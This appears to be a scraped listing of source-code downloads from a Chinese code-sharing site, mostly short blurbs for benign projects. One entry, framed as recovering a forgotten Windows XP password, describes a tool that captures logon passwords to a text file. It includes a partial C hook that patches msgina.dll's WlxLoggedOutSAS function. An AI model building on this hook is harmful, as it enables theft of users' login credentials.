-
模拟自动售货机
Simulate a Vending Machine
- 2022-01-26 08:16:40下载
- 积分:1
-
用 VB 做的 GPS 通讯程序,显示当前时钟。
用 VB 做的 GPS 通讯程序,显示当前时钟。-do with VB GPS communication process, showing current clock.
- 2022-06-02 22:36:42下载
- 积分:1
-
一个学习windows编程的助手,一定适全初学者
一个学习windows编程的助手,一定适全初学者-An assistant of studying windows programming. It is suitable for beginners.
- 2022-07-19 13:35:09下载
- 积分:1
-
简单的图像处理,如:高斯。低
简单的图像处理,如:高斯。低通。。等等
- 2023-05-30 01:40:04下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
Use TreeView and ListView controls together.
使用treeview和listview的例子,代码比较简单,但可以正常使用。-Use TreeView and ListView controls together.
- 2022-04-08 09:34:53下载
- 积分:1
-
VC++的插件,对编程的人很好。发现好东西大家一起分享啊!
VC++的插件,对编程的人很好。发现好东西大家一起分享啊!-VC++ The plug-in, people of good programming. Found good things to share with everyone ah!
- 2022-02-05 01:06:48下载
- 积分:1
-
基于AForge.NET Framework的普通摄像头颜色识别
基于AForge.NET Framework的普通摄像头颜色识别与跟踪c#源码,可以与单片机WIFI通讯,可以控制舵机,以及机器人追踪控制!
- 2022-04-09 10:43:08下载
- 积分:1
-
upnp发现协议代码
upnp发现协议,使用比较简洁的c++代码实现upnp设备的可靠发现,可以改写成能被objective-c调用的类
- 2022-02-04 21:10:25下载
- 积分:1
-
informix数据库开发
ESQL语言编译
informix数据库开发
ESQL语言编译-informix database development ESQL compiler
- 2022-01-21 03:34:24下载
- 积分:1